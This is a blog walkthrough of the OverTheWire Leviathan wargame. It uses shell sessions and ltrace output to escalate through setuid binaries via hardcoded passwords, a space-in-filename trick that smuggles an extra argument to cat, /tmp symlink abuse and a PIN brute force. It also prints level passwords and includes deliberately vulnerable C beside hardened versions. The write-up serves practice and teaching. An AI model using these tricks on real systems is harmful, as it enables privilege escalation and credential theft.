30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Leviathan

Location

http://overthewire.org/wargames/leviathan/

Introduction

Dare you face the lord of the oceans?
Leviathan is a wargame that has been rescued from the demise of intruded.net, previously hosted on leviathan.intruded.net. Big thanks to adc, morla and reth for their help in resurrecting this game!
What follows below is the original description of leviathan, copied from intruded.net:
Summary:
Difficulty: 1/10
Levels: 8
Platform: Linux/x86
Author:
Anders Tonfeldt
Special Thanks:
We would like to thank AstroMonk for coming up with a replacement idea for the last level,
deadfood for finding a leveljump and Coi for finding a non-planned vulnerability.
Description:
This wargame doesn’t require any knowledge about programming – just a bit of common
sense and some knowledge about basic *nix commands. We had no idea that it’d be this
hard to make an interesting wargame that wouldn’t require programming abilities from
the players. Hopefully we made an interesting challenge for the new ones.
Leviathan’s levels are called leviathan0, leviathan1, … etc. and can be accessed on leviathan.labs.overthewire.org through SSH.
To login to the first level use:
Username: leviathan0
Password: leviathan0
Data for the levels can be found in the home directories. You can look at /etc/leviathan_pass for the various level passwords.

Level 0 –> 1

leviathan0@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4.0K Oct 14 14:27 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ ls -lah ./.backup
total 140K
drwxr-x--- 2 leviathan1 leviathan0 4.0K Oct 14 14:27 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 131K Nov 14  2014 bookmarks.html
leviathan0@melinda:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

Level 1 –> 2

leviathan1@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7.4K Nov 14  2014 check

Looks like an ELF. When I execute it, it asks for a password.

leviathan1@melinda:~$ ./check
password: test
Wrong password, Good Bye ...

I use ltrace to see what is happening behind the scenes.

leviathan1@melinda:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7a4, 0x80485f0 <unfinished ...>
printf("password: ")                             = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password:
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
strcmp("\n\n\n", "sex")                          = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)             = 29
+++ exited (status 0) +++

The trace shows strcmp comparing my input against the hardcoded string sex. When I enter that as the password, I get a shell.

leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ find / -group leviathan2 2>/dev/null
/etc/leviathan_pass/leviathan2
/run/user/12002
/home/leviathan2/printfile
/sys/fs/cgroup/systemd/user/12002.user/124352.session
/sys/fs/cgroup/systemd/user/12002.user/124352.session/tasks
/sys/fs/cgroup/systemd/user/12002.user/124352.session/cgroup.procs
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Level 2 –> 3

leviathan2@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan3 leviathan2 7.4K Nov 14  2014 printfile
leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
leviathan2@melinda:~$ ltrace ./printfile
__libc_start_main(0x804852d, 1, 0xffffd794, 0x8048600 <unfinished ...>
puts("*** File Printer ***"*** File Printer ***
)                     = 21
printf("Usage: %s filename\n", "./printfile"Usage: ./printfile filename
)    = 28
+++ exited (status 255) +++
leviathan2@melinda:~$ ./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Bummer.

leviathan2@melinda:~$ ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x804852d, 2, 0xffffd774, 0x8048600 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4)      = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++
leviathan2@melinda:/tmp/31337$ ltrace ~/printfile ./n13mant
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("./n13mant", 4)                           = 0
snprintf("/bin/cat ./n13mant", 511, "/bin/cat %s", "./n13mant") = 18
system("/bin/cat ./n13mant" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

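The first function called is access, which checks whether the file named by the argument is readable (mode 4). The program then builds the string /bin/cat <argument> and passes it to system.
I need to pass the access check and still trick cat into opening the desired file, which in this case is the file with the password. For this I create a symbolic link named open that points to the password file, and a file named "open file", whose name begins with the link's name followed by a space. access sees ./open file as a single path that I am allowed to read, while the shell started by system splits the string at the space, so cat receives ./open and file as two separate arguments.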

leviathan2@melinda:/tmp/31337$ ln -s /etc/leviathan_pass/leviathan3 ./open
leviathan2@melinda:/tmp/31337$ touch open\ file
leviathan2@melinda:/tmp/31337$ ~/printfile ./open\ file
Ahdiemoo1j
/bin/cat: file: No such file or directory
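
The check-then-shell mismatch from the trace, reproduced in a throwaway sandbox next to a hardened reader. This is an added example, not the source of printfile: the function names, the /tmp/pfdemo sandbox and the SECRET marker are constructed, and popen with 2>/dev/null stands in for the traced system call so the output can be captured.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Pattern from the trace: check one string, then let a shell re-parse it.
 * popen() stands in for system() so the output can be captured. */
int vulnerable_print(const char *path, char *out, size_t outsz) {
    char cmd[512];
    if (access(path, R_OK) != 0) return -1;      /* whole string checked as ONE path */
    snprintf(cmd, sizeof cmd, "/bin/cat %s 2>/dev/null", path);
    FILE *p = popen(cmd, "r");                   /* sh splits at the space: TWO paths */
    if (!p) return -1;
    size_t n = fread(out, 1, outsz - 1, p);
    out[n] = '\0';
    pclose(p);
    return (int)n;
}

/* Hardened: act as the caller, skip the shell, open exactly the name that was given. */
int safe_print(const char *path, char *out, size_t outsz) {
    if (seteuid(getuid()) != 0) return -1;       /* no-op unless the binary is setuid */
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, out, outsz - 1);
    close(fd);
    if (n >= 0) out[n] = '\0';
    return (int)n;
}

/* Constructed sandbox: dir/open holds a marker, "dir/open file" is an empty decoy. */
int make_sandbox(char *dir, char *decoy, size_t sz) {
    char target[600];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/open", dir);
    snprintf(decoy, sz, "%s/open file", dir);
    FILE *t = fopen(target, "w"), *d = fopen(decoy, "w");
    if (!t || !d || fputs("SECRET\n", t) < 0) return -1;
    return (fclose(t) | fclose(d)) ? -1 : 0;
}

int main(void) {
    char dir[] = "/tmp/pfdemoXXXXXX", decoy[600], out[64];
    if (make_sandbox(dir, decoy, sizeof decoy)) return 1;
    printf("vulnerable read %d bytes\n", vulnerable_print(decoy, out, sizeof out));
    printf("hardened read %d bytes\n", safe_print(decoy, out, sizeof out));
    return 0;
}
```

The vulnerable reader returns the contents of dir/open although only "dir/open file" was checked; the hardened reader returns the empty decoy it was actually asked for.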

Level 3 –> 4

leviathan3@melinda:~$ ls -lah
total 32K
drwxr-xr-x   2 root       root       4.0K Mar 21  2015 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan4 leviathan3 9.8K Mar 21  2015 level3
leviathan3@melinda:~$ ./level3
Enter the password> 12345
bzzzzzzzzap. WRONG
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7a4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                       = -1
printf("Enter the password> ")                   = 20
fgets(Enter the password> kakaka
"kakaka\n", 256, 0xf7fcac20) = 0xffffd59c
strcmp("kakaka\n", "snlprintf\n") = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++

Looks like snlprintf is the correct string to use.

leviathan3@melinda:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ whoami
leviathan4
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Level 4 –> 5

leviathan4@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root root        675 Apr  9  2014 .profile
dr-xr-x---   2 root leviathan4 4.0K Nov 14  2014 .trash
leviathan4@melinda:~$ cd .trash
leviathan4@melinda:~/.trash$ ls -lah
total 16K
dr-xr-x--- 2 root       leviathan4 4.0K Nov 14  2014 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-r-sr-x--- 1 leviathan5 leviathan4 7.3K Nov 14  2014 bin
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
leviathan4@melinda:~/.trash$ ltrace ./bin
__libc_start_main(0x80484cd, 1, 0xffffd784, 0x80485c0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r") = 0
+++ exited (status 255) +++

So the password is converted into binary. For decoding it, I use this site.

Level 5 –> 6

leviathan5@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan6 leviathan5 7.5K Nov 14  2014 leviathan5
leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd794, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                = 26
exit(-1 <no return ...>
+++ exited (status 255) +++

The program is looking for /tmp/file.log, which is missing. To see what the program wants, I create that file.

leviathan5@melinda:~$ touch /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd794, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0x804b008
fgetc(0x804b008)                                 = '\377'
feof(0x804b008)                                  = 1
fclose(0x804b008)                                = 0
getuid()                                         = 12005
setuid(12005)                                    = 0
unlink("/tmp/file.log")                          = 0
+++ exited (status 0) +++

So it wants to open the file and read the content. To get the password for the next level I’m going to make a symbolic link to the desired password file and let ./leviathan5 read it for me.

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
UgaoFee4li
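
In the trace above, setuid(getuid()) runs only after /tmp/file.log has been opened and read, so the open follows whatever that name points to. An added example (not the source of leviathan5) of opening a file in a world-writable directory defensively; the function names, the sandbox paths and the policy that the log must be owned by a given account are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the trace: a plain open follows whatever the /tmp name points to. */
int naive_open(const char *path) {
    return open(path, O_RDONLY);
}

/* Hardened open for a file in a world-writable directory. Returns an fd, or -1 if
 * the name is a symlink, not a regular file, hard-linked elsewhere, or not owned
 * by `owner` (which account should own the log is an assumption of this example). */
int careful_open(const char *path, uid_t owner) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;                 /* fails when the last component is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);                         /* checks ran on the open fd, not the name */
        return -1;
    }
    return fd;
}

/* Constructed sandbox: dir/real.log plus dir/file.log -> real.log. */
int make_links(char *dir, char *real, char *lnk, size_t sz) {
    if (!mkdtemp(dir)) return -1;
    snprintf(real, sz, "%s/real.log", dir);
    snprintf(lnk, sz, "%s/file.log", dir);
    FILE *f = fopen(real, "w");
    if (!f || fclose(f) != 0) return -1;
    return symlink(real, lnk);
}

int main(void) {
    char dir[] = "/tmp/l5demoXXXXXX", real[64], lnk[64];
    if (make_links(dir, real, lnk, sizeof real)) return 1;
    printf("naive, symlink:   fd %d\n", naive_open(lnk));
    printf("careful, symlink: fd %d\n", careful_open(lnk, geteuid()));
    printf("careful, regular: fd %d\n", careful_open(real, geteuid()));
    return 0;
}
```

O_NOFOLLOW only covers the final path component, which is why the ownership and link-count checks are made with fstat on the descriptor that was actually opened.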

Level 6 –> 7

leviathan6@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan7 leviathan6 7.4K Nov 14  2014 leviathan6
leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 1234
Wrong

It wants a 4-digit PIN.

leviathan6@melinda:~$ for x in $(seq -w 0000 9999); do ./leviathan6 $x | echo $x; done > /tmp/n13mant_0001/code

When I check the file named ‘code’, I can see that the output stops at ‘7123’, which is where the loop hangs. When I enter this PIN I get another shell, this time as leviathan7. Time for the last password.

leviathan6@melinda:~$ ./leviathan6 7123
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Level 7

leviathan7@melinda:~$ pwd
/home/leviathan7
leviathan7@melinda:~$ ls -lah
total 24K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r--r-----   1 leviathan7 leviathan7  178 Nov 14  2014 CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the games on the web. Thank you!)

Oops…….sorry for ignoring that request.
 
